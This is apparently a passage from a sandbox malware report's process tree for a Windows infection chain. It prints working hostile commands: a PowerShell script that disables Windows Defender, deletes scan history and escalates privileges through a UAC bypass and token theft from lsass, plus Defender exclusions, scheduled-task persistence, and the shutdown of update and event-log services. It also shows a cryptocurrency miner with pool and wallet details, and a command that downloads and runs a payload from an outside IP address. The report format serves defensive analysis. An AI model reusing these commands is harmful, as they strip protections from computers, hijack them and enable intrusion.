     ' T r u s t e d I n s t a l l e r ' , ' l s a s s ' | % { i f ( ! $ p n ) { n e t 1   s t a r t   $ _   2 > & 1   > $ n u l l ; $ p n = [ D i a g n o s t i c s . P r o c e s s ] : : G e t P r o c e s s e s B y N a m e ( $ _ ) [ 0 ] ; } }  
     $ W P . i n v o k e ( $ n u l l , @ ( $ v , $ p n . H a n d l e ) ) ;   $ S Z = $ H . " G e t ` M e t h o d " ( " S i z e O f " , [ t y p e [ ] ] ' t y p e ' ) ;   $ T 1 . f 1 = 1 3 1 0 7 2 ;   $ T 1 . f 2 = $ Z ;   $ T 1 . f 3 = $ v ;   $ T 2 . f 1 = 1  
     $ T 2 . f 2 = 1 ; $ T 2 . f 3 = 1 ; $ T 2 . f 4 = 1 ; $ T 2 . f 6 = $ T 1 ; $ T 3 . f 1 = $ S Z . i n v o k e ( $ n u l l , $ T [ 4 ] ) ; $ T 4 . f 1 = $ T 3 ; $ T 4 . f 2 = $ H G . i n v o k e ( $ n u l l , $ S Z . i n v o k e ( $ n u l l , $ T [ 2 ] ) )  
     $ H . " G e t ` M e t h o d " ( " S t r u c t u r e T o ` P t r " , [ t y p e [ ] ] ( $ D [ 2 ] , $ J , ' b o o l e a n ' ) ) . i n v o k e ( $ n u l l , @ ( ( $ T 2 - a s   $ D [ 2 ] ) , $ T 4 . f 2 , $ f a l s e ) ) ; $ w i n d o w = 0 x 0 E 0 8 0 6 0 0  
     $ 9 = $ T [ 0 ] . " G e t ` M e t h o d " ( ' C r e a t e P r o c e s s ' ) . I n v o k e ( $ n u l l , @ ( $ n u l l , $ c m d , 0 , 0 , 0 , $ w i n d o w , 0 , $ n u l l , ( $ T 4 - a s   $ D [ 4 ] ) , ( $ T 5 - a s   $ D [ 5 ] ) ) ) ;   b r e a k  
 }  
  
 $ w d p = ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r '  
 '   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s ' , ' \ U X   C o n f i g u r a t i o n ' , ' \ M p E n g i n e ' , ' \ S p y n e t ' , ' \ R e a l - T i m e   P r o t e c t i o n '   | %   { n i   ( $ w d p + $ _ ) - e a   0 | o u t - n u l l }  
  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s '   D i s a b l e N o t i f i c a t i o n s   1   - T y p e   D w o r d   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ U X   C o n f i g u r a t i o n '   N o t i f i c a t i o n _ S u p p r e s s   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s '   D i s a b l e N o t i f i c a t i o n s   1   - T y p e   D w o r d   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ U X   C o n f i g u r a t i o n '   N o t i f i c a t i o n _ S u p p r e s s   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s \ S y s t e m '   E n a b l e S m a r t S c r e e n   0   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r '   D i s a b l e A n t i S p y w a r e   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r '   D i s a b l e A n t i S p y w a r e   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 n e t 1   s t o p   w i n d e f e n d  
 s c . e x e   c o n f i g   w i n d e f e n d   d e p e n d =   R p c S s - T O G G L E  
 k i l l   - N a m e   M p C m d R u n   - F o r c e   - e a   0  
 s t a r t   ( $ e n v : P r o g r a m F i l e s + ' \ W i n d o w s   D e f e n d e r \ M p C m d R u n . e x e ' )   - A r g   ' - D i s a b l e S e r v i c e '   - w i n   1  
 d e l   ( $ e n v : P r o g r a m D a t a + ' \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ S c a n s \ m p e n g i n e d b . d b ' )   - F o r c e   - e a   0                       # #   C o m m e n t e d   =   k e e p   s c a n   h i s t o r y  
 d e l   ( $ e n v : P r o g r a m D a t a + ' \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ S c a n s \ H i s t o r y \ S e r v i c e ' )   - R e c u r s e   - F o r c e   - e a   0  
 ' @   - F o r c e   - e a   0 ;   i e x ( ( g p   R e g i s t r y : : H K E Y _ U s e r s \ S - 1 - 5 - 2 1 * \ V o l a t i l e *   T o g g l e D e f e n d e r   - e a   0 ) [ 0 ] . T o g g l e D e f e n d e r )  
 # - _ - # 9⤵PID:6204
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" qc windefend10⤵
- Launches sc.exe
PID:3488
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"10⤵PID:4680
-
-
C:\Windows\system32\whoami.exe"C:\Windows\system32\whoami.exe" /groups10⤵PID:4180
-
-
C:\Windows\system32\net1.exe"C:\Windows\system32\net1.exe" start TrustedInstaller10⤵PID:5784
-
-
C:\Windows\system32\net1.exe"C:\Windows\system32\net1.exe" start lsass10⤵PID:5432
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc @ ( e c h o   o f f % ) [ 1 ]  
 s p   ' H K C U : \ V o l a t i l e   E n v i r o n m e n t '   ' T o g g l e D e f e n d e r '   @ '  
 i f   ( $ ( s c . e x e   q c   w i n d e f e n d )   - l i k e   ' * T O G G L E * ' )   { $ T O G G L E = 7 ; $ K E E P = 6 ; $ A = ' E n a b l e ' ; $ S = ' O F F ' } e l s e { $ T O G G L E = 6 ; $ K E E P = 7 ; $ A = ' D i s a b l e ' ; $ S = ' O N ' }  
  
 i f   ( $ e n v : 1   - n e   6   - a n d   $ e n v : 1   - n e   7 )   {   $ e n v : 1 = $ T O G G L E   }  
  
 s t a r t   c m d   - a r g s   ' / d / r   S e c u r i t y H e a l t h S y s t r a y   &   " % P r o g r a m F i l e s % \ W i n d o w s   D e f e n d e r \ M S A S C u i L . e x e " '   - w i n   1  
  
 $ n o t i f = ' H K C U : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s \ C u r r e n t V e r s i o n \ N o t i f i c a t i o n s \ S e t t i n g s \ W i n d o w s . S y s t e m T o a s t . S e c u r i t y A n d M a i n t e n a n c e '  
 n i   $ n o t i f   - e a   0 | o u t - n u l l ;   r i   $ n o t i f . r e p l a c e ( ' S e t t i n g s ' , ' C u r r e n t ' )   - R e c u r s e   - F o r c e   - e a   0  
 s p   $ n o t i f   E n a b l e d   0   - T y p e   D w o r d   - F o r c e   - e a   0 ;   i f   ( $ T O G G L E   - e q   7 )   { r p   $ n o t i f   E n a b l e d   - F o r c e   - e a   0 }  
  
 $ t s = N e w - O b j e c t   - C o m O b j e c t   ' S c h e d u l e . S e r v i c e ' ;   $ t s . C o n n e c t ( ) ;   $ b a f f l i n g = $ t s . G e t F o l d e r ( ' \ M i c r o s o f t \ W i n d o w s \ D i s k C l e a n u p ' )  
 $ b p a s s = $ b a f f l i n g . G e t T a s k ( ' S i l e n t C l e a n u p ' ) ;   $ f l a w = $ b p a s s . D e f i n i t i o n  
  
 $ u = 0 ; $ w = w h o a m i   / g r o u p s ; i f ( $ w - l i k e ' * 1 - 5 - 3 2 - 5 4 4 * ' ) { $ u = 1 } ; i f ( $ w - l i k e ' * 1 - 1 6 - 1 2 2 8 8 * ' ) { $ u = 2 } ; i f ( $ w - l i k e ' * 1 - 1 6 - 1 6 3 8 4 * ' ) { $ u = 3 }  
  
 $ r = [ c h a r ] 1 3 ;   $ n f o = [ c h a r ] 3 9 + $ r + '   ( \       / ) ' + $ r + ' (   *   .   *   )     A   l i m i t e d   a c c o u n t   p r o t e c t s   y o u   f r o m   U A C   e x p l o i t s ' + $ r + '         ` ` ` ' + $ r + [ c h a r ] 3 9  
 $ s c r i p t = ' - n o p   - w i n   1   - c   &   { r p   h k c u : \ e n v i r o n m e n t   w i n d i r   - e a   0 ; $ A v e Y o = ' + $ n f o + ' ; $ e n v : 1 = ' + $ e n v : 1 ;   $ e n v : _ _ C O M P A T _ L A Y E R = ' I n s t a l l e r '  
 $ s c r i p t + = ' ; i e x ( ( g p   R e g i s t r y : : H K E Y _ U s e r s \ S - 1 - 5 - 2 1 * \ V o l a t i l e *   T o g g l e D e f e n d e r   - e a   0 ) [ 0 ] . T o g g l e D e f e n d e r ) } ' ;   $ c m d = ' p o w e r s h e l l   ' + $ s c r i p t  
  
 i f   ( $ u   - e q   0 )   {  
     s t a r t   p o w e r s h e l l   - a r g s   $ s c r i p t   - v e r b   r u n a s   - w i n   1 ;   b r e a k  
 }  
 i f   ( $ u   - e q   1 )   {  
     i f   ( $ f l a w . A c t i o n s . I t e m ( 1 ) . P a t h   - i n o t l i k e   ' * w i n d i r * ' ) { s t a r t   p o w e r s h e l l   - a r g s   $ s c r i p t   - v e r b   r u n a s   - w i n   1 ;   b r e a k }  
     s p   h k c u : \ e n v i r o n m e n t   w i n d i r   $ ( ' p o w e r s h e l l   ' + $ s c r i p t + '   # ' )  
     $ z = $ b p a s s . R u n E x ( $ n u l l , 2 , 0 , $ n u l l ) ;   $ w a i t = 0 ;   w h i l e ( $ b p a s s . S t a t e   - g t   3   - a n d   $ w a i t   - l t   1 7 ) { s l e e p   - m   1 0 0 ;   $ w a i t + = 0 . 1 }  
     i f ( g p   h k c u : \ e n v i r o n m e n t   w i n d i r   - e a   0 ) { r p   h k c u : \ e n v i r o n m e n t   w i n d i r   - e a   0 ; s t a r t   p o w e r s h e l l   - a r g s   $ s c r i p t   - v e r b   r u n a s   - w i n   1 } ; b r e a k  
 }  
 i f   ( $ u   - e q   2 )   {  
     $ A = [ A p p D o m a i n ] : : C u r r e n t D o m a i n . " D e f ` i n e D y n a m i c A s s e m b l y " ( 1 , 1 ) . " D e f ` i n e D y n a m i c M o d u l e " ( 1 ) ; $ D = @ ( ) ; 0 . . 5 | % { $ D + = $ A . " D e f ` i n e T y p e " ( ' A ' + $ _ ,  
     1 1 7 9 9 1 3 , [ V a l u e T y p e ] ) }   ; 4 , 5 | % { $ D + = $ D [ $ _ ] . " M a k ` e B y R e f T y p e " ( ) }   ; $ I = [ I n t 3 2 ] ; $ J = " I n t ` P t r " ; $ P = $ I . m o d u l e . G e t T y p e ( " S y s t e m . $ J " ) ;   $ F = @ ( 0 )  
     $ F + = ( $ P , $ I , $ P ) , ( $ I , $ I , $ I , $ I , $ P , $ D [ 1 ] ) , ( $ I , $ P , $ P , $ P , $ I , $ I , $ I , $ I , $ I , $ I , $ I , $ I , [ I n t 1 6 ] , [ I n t 1 6 ] , $ P , $ P , $ P , $ P ) , ( $ D [ 3 ] , $ P ) , ( $ P , $ P , $ I , $ I )  
     $ S = [ S t r i n g ] ;   $ 9 = $ D [ 0 ] . " D e f ` i n e P I n v o k e M e t h o d " ( ' C r e a t e P r o c e s s ' , " k e r n e l ` 3 2 " , 8 2 1 4 , 1 , $ I , @ ( $ S , $ S , $ I , $ I , $ I , $ I , $ I , $ S , $ D [ 6 ] , $ D [ 7 ] ) , 1 , 4 )  
     1 . . 5 | % { $ k = $ _ ; $ n = 1 ; $ F [ $ _ ] | % { $ 9 = $ D [ $ k ] . " D e f ` i n e F i e l d " ( ' f ' + $ n + + , $ _ , 6 ) } } ; $ T = @ ( ) ; 0 . . 5 | % { $ T + = $ D [ $ _ ] . " C r ` e a t e T y p e " ( ) ; $ Z = [ u i n t p t r ] : : s i z e  
     n v   ( ' T ' + $ _ ) ( [ A c t i v a t o r ] : : C r e a t e I n s t a n c e ( $ T [ $ _ ] ) ) } ;   $ H = $ I . m o d u l e . G e t T y p e ( " S y s t e m . R u n t i m e . I n t e r o p ` S e r v i c e s . M a r ` s h a l " ) ;  
     $ W P = $ H . " G e t ` M e t h o d " ( " W r i t e $ J " , [ t y p e [ ] ] ( $ J , $ J ) ) ;   $ H G = $ H . " G e t ` M e t h o d " ( " A l l o c H ` G l o b a l " , [ t y p e [ ] ] ' i n t 3 2 ' ) ;   $ v = $ H G . i n v o k e ( $ n u l l , $ Z )  
     ' T r u s t e d I n s t a l l e r ' , ' l s a s s ' | % { i f ( ! $ p n ) { n e t 1   s t a r t   $ _   2 > & 1   > $ n u l l ; $ p n = [ D i a g n o s t i c s . P r o c e s s ] : : G e t P r o c e s s e s B y N a m e ( $ _ ) [ 0 ] ; } }  
     $ W P . i n v o k e ( $ n u l l , @ ( $ v , $ p n . H a n d l e ) ) ;   $ S Z = $ H . " G e t ` M e t h o d " ( " S i z e O f " , [ t y p e [ ] ] ' t y p e ' ) ;   $ T 1 . f 1 = 1 3 1 0 7 2 ;   $ T 1 . f 2 = $ Z ;   $ T 1 . f 3 = $ v ;   $ T 2 . f 1 = 1  
     $ T 2 . f 2 = 1 ; $ T 2 . f 3 = 1 ; $ T 2 . f 4 = 1 ; $ T 2 . f 6 = $ T 1 ; $ T 3 . f 1 = $ S Z . i n v o k e ( $ n u l l , $ T [ 4 ] ) ; $ T 4 . f 1 = $ T 3 ; $ T 4 . f 2 = $ H G . i n v o k e ( $ n u l l , $ S Z . i n v o k e ( $ n u l l , $ T [ 2 ] ) )  
     $ H . " G e t ` M e t h o d " ( " S t r u c t u r e T o ` P t r " , [ t y p e [ ] ] ( $ D [ 2 ] , $ J , ' b o o l e a n ' ) ) . i n v o k e ( $ n u l l , @ ( ( $ T 2 - a s   $ D [ 2 ] ) , $ T 4 . f 2 , $ f a l s e ) ) ; $ w i n d o w = 0 x 0 E 0 8 0 6 0 0  
     $ 9 = $ T [ 0 ] . " G e t ` M e t h o d " ( ' C r e a t e P r o c e s s ' ) . I n v o k e ( $ n u l l , @ ( $ n u l l , $ c m d , 0 , 0 , 0 , $ w i n d o w , 0 , $ n u l l , ( $ T 4 - a s   $ D [ 4 ] ) , ( $ T 5 - a s   $ D [ 5 ] ) ) ) ;   b r e a k  
 }  
  
 $ w d p = ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r '  
 '   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s ' , ' \ U X   C o n f i g u r a t i o n ' , ' \ M p E n g i n e ' , ' \ S p y n e t ' , ' \ R e a l - T i m e   P r o t e c t i o n '   | %   { n i   ( $ w d p + $ _ ) - e a   0 | o u t - n u l l }  
  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s '   D i s a b l e N o t i f i c a t i o n s   1   - T y p e   D w o r d   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ U X   C o n f i g u r a t i o n '   N o t i f i c a t i o n _ S u p p r e s s   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s '   D i s a b l e N o t i f i c a t i o n s   1   - T y p e   D w o r d   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ U X   C o n f i g u r a t i o n '   N o t i f i c a t i o n _ S u p p r e s s   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s \ S y s t e m '   E n a b l e S m a r t S c r e e n   0   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r '   D i s a b l e A n t i S p y w a r e   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r '   D i s a b l e A n t i S p y w a r e   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 n e t 1   s t o p   w i n d e f e n d  
 s c . e x e   c o n f i g   w i n d e f e n d   d e p e n d =   R p c S s - T O G G L E  
 k i l l   - N a m e   M p C m d R u n   - F o r c e   - e a   0  
 s t a r t   ( $ e n v : P r o g r a m F i l e s + ' \ W i n d o w s   D e f e n d e r \ M p C m d R u n . e x e ' )   - A r g   ' - D i s a b l e S e r v i c e '   - w i n   1  
 d e l   ( $ e n v : P r o g r a m D a t a + ' \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ S c a n s \ m p e n g i n e d b . d b ' )   - F o r c e   - e a   0                       # #   C o m m e n t e d   =   k e e p   s c a n   h i s t o r y  
 d e l   ( $ e n v : P r o g r a m D a t a + ' \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ S c a n s \ H i s t o r y \ S e r v i c e ' )   - R e c u r s e   - F o r c e   - e a   0  
 ' @   - F o r c e   - e a   0 ;   i e x ( ( g p   R e g i s t r y : : H K E Y _ U s e r s \ S - 1 - 5 - 2 1 * \ V o l a t i l e *   T o g g l e D e f e n d e r   - e a   0 ) [ 0 ] . T o g g l e D e f e n d e r )  
 # - _ - # 9⤵PID:6824
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" qc windefend10⤵
- Launches sc.exe
PID:6428
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"10⤵PID:3248
-
-
C:\Windows\system32\whoami.exe"C:\Windows\system32\whoami.exe" /groups10⤵PID:2440
-
-
C:\Windows\system32\net1.exe"C:\Windows\system32\net1.exe" start TrustedInstaller10⤵PID:6900
-
-
C:\Windows\system32\net1.exe"C:\Windows\system32\net1.exe" start lsass10⤵PID:5012
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10215600101\packed.exe"C:\Users\Admin\AppData\Local\Temp\10215600101\packed.exe"6⤵PID:2088
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAFIAdQBuAHQAaQBtAGUAQQBwAHAAJwA=7⤵
- Command and Scripting Interpreter: PowerShell
PID:5304
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /create /tn "SystemHelperTask" /tr "C:\Users\Admin\AppData\Local\Temp\10215600101\packed.exe" /sc onlogon /rl HIGHEST /f7⤵
- Scheduled Task/Job: Scheduled Task
PID:6276
-
-
C:\Program Files\RuntimeApp\0000028297.exe"C:\Program Files\RuntimeApp\0000028297.exe"7⤵PID:3132
-
-
-
C:\Users\Admin\AppData\Local\Temp\10217320101\Esu6YYl.exe"C:\Users\Admin\AppData\Local\Temp\10217320101\Esu6YYl.exe"6⤵PID:3632
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -inputformat none -outputformat none -NonInteractive -Command Add -MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Updater"7⤵
- Command and Scripting Interpreter: PowerShell
PID:6516
-
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /Create /SC ONLOGON /RL HIGHEST /TN "Updater" /TR "C:\Users\Admin\AppData\Roaming\Updater\Esu6YYl.exe" /F7⤵
- Scheduled Task/Job: Scheduled Task
PID:5152
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /C ping 127.0.0.1 -n 3 > nul && start "" "C:\Users\Admin\AppData\Roaming\Updater\Esu6YYl.exe"7⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:6692 -
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 38⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2528
-
-
C:\Users\Admin\AppData\Roaming\Updater\Esu6YYl.exe"C:\Users\Admin\AppData\Roaming\Updater\Esu6YYl.exe"8⤵PID:6468
-
C:\Users\Admin\AppData\Roaming\Updater\Esu6YYl.exeC:\Users\Admin\AppData\Roaming\Updater\Esu6YYl.exe curl.dll9⤵PID:3948
-
-
C:\Users\Admin\AppData\Roaming\Updater\Esu6YYl.exeC:\Users\Admin\AppData\Roaming\Updater\Esu6YYl.exe --url pool.hashvault.pro:443 --user 4AzoDsqqcueLbpDUZn5LUYA6JeJ61CWW51bdL9UsCNLKc4wq8BZxBuTPZPQDcMfxZPRRu643zHB5fXjgc9sGwELjQt7Tkxs --pass x --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b149⤵PID:6168
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10219920101\O9s3coZ.exe"C:\Users\Admin\AppData\Local\Temp\10219920101\O9s3coZ.exe"6⤵PID:4756
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵PID:1240
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵PID:1796
-
-
-
C:\Users\Admin\AppData\Local\Temp\10222660101\j21Hq7C.exe"C:\Users\Admin\AppData\Local\Temp\10222660101\j21Hq7C.exe"6⤵PID:6764
-
C:\Users\Admin\AppData\Local\Temp\mine.exe"C:\Users\Admin\AppData\Local\Temp\mine.exe"7⤵PID:2232
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force8⤵
- Command and Scripting Interpreter: PowerShell
PID:2056
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart8⤵PID:16552
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart9⤵PID:12256
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc8⤵
- Launches sc.exe
PID:16608
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc8⤵
- Launches sc.exe
PID:5204
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv8⤵
- Launches sc.exe
PID:4252
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits8⤵
- Launches sc.exe
PID:5172
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc8⤵
- Launches sc.exe
PID:17160
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 08⤵
- Power Settings
PID:3056
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 08⤵
- Power Settings
PID:1820
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 08⤵
- Power Settings
PID:3784
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 08⤵
- Power Settings
PID:5380
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe8⤵PID:1796
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "WindowsAutHost"8⤵
- Launches sc.exe
PID:12312
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "WindowsAutHost" binpath= "C:\ProgramData\WindowsServices\WindowsAutHost" start= "auto"8⤵
- Launches sc.exe
PID:12512
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog8⤵
- Launches sc.exe
PID:12580
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "WindowsAutHost"8⤵
- Launches sc.exe
PID:12588
-
-
-
C:\Users\Admin\AppData\Local\Temp\debuger.exe"C:\Users\Admin\AppData\Local\Temp\debuger.exe"7⤵PID:13056
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"8⤵PID:13168
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10222760101\3595c557b8.exe"C:\Users\Admin\AppData\Local\Temp\10222760101\3595c557b8.exe"6⤵PID:3892
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn bpsa8ma9hmu /tr "mshta C:\Users\Admin\AppData\Local\Temp\AJfj74O4h.hta" /sc minute /mo 25 /ru "Admin" /f7⤵PID:3612
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn bpsa8ma9hmu /tr "mshta C:\Users\Admin\AppData\Local\Temp\AJfj74O4h.hta" /sc minute /mo 25 /ru "Admin" /f8⤵
- Scheduled Task/Job: Scheduled Task
PID:3304
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\AJfj74O4h.hta7⤵PID:6944
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'OTWK5VFJTARMAZJV20V9VFIFAWZ6KXJ7.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;8⤵
- Command and Scripting Interpreter: PowerShell
PID:4496 -
C:\Users\Admin\AppData\Local\TempOTWK5VFJTARMAZJV20V9VFIFAWZ6KXJ7.EXE"C:\Users\Admin\AppData\Local\TempOTWK5VFJTARMAZJV20V9VFIFAWZ6KXJ7.EXE"9⤵PID:728
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10222770121\am_no.cmd" "6⤵PID:6644
-
C:\Windows\SysWOW64\timeout.exetimeout /t 27⤵
- Delays execution with timeout.exe
PID:3528
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"7⤵PID:5524
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"8⤵
- Command and Scripting Interpreter: PowerShell
PID:7020
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10222880101\dBKUxeI.exe"C:\Users\Admin\AppData\Local\Temp\10222880101\dBKUxeI.exe"6⤵PID:5528
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden -Command "Expand-Archive -Force \"C:\Users\Admin\AppData\Local\Temp\updater101\backup.zip\" \"C:\Users\Admin\AppData\Local\Temp\updater101\backup\""7⤵
- Command and Scripting Interpreter: PowerShell
PID:6656
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden -Command "Expand-Archive -Force \"C:\Users\Admin\AppData\Local\Temp\updater101\wwfcx.zip\" \"C:\Users\Admin\AppData\Local\Temp\updater101\wwfcx\""7⤵
- Command and Scripting Interpreter: PowerShell
PID:16660
-
-
-
C:\Users\Admin\AppData\Local\Temp\10223440101\60579647f8.exe"C:\Users\Admin\AppData\Local\Temp\10223440101\60579647f8.exe"6⤵PID:1840
-
-
C:\Users\Admin\AppData\Local\Temp\10223450101\17dffd538c.exe"C:\Users\Admin\AppData\Local\Temp\10223450101\17dffd538c.exe"6⤵PID:17092
-
-
C:\Users\Admin\AppData\Local\Temp\10223460101\b7a02d7a29.exe"C:\Users\Admin\AppData\Local\Temp\10223460101\b7a02d7a29.exe"6⤵PID:2740
-
-
C:\Users\Admin\AppData\Local\Temp\10223470101\cf02b63317.exe"C:\Users\Admin\AppData\Local\Temp\10223470101\cf02b63317.exe"6⤵PID:2216
-
-
C:\Users\Admin\AppData\Local\Temp\10223480101\61d97d86d7.exe"C:\Users\Admin\AppData\Local\Temp\10223480101\61d97d86d7.exe"6⤵PID:13816
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T7⤵
- Kills process with taskkill
PID:14116
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T7⤵
- Kills process with taskkill
PID:7624
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T7⤵
- Kills process with taskkill
PID:7892
-
-
-
C:\Users\Admin\AppData\Local\Temp\10223490101\7d729d906e.exe"C:\Users\Admin\AppData\Local\Temp\10223490101\7d729d906e.exe"6⤵PID:736
-
-
C:\Users\Admin\AppData\Local\Temp\10223500101\f74fcebdef.exe"C:\Users\Admin\AppData\Local\Temp\10223500101\f74fcebdef.exe"6⤵PID:7460
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exeC:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe1⤵
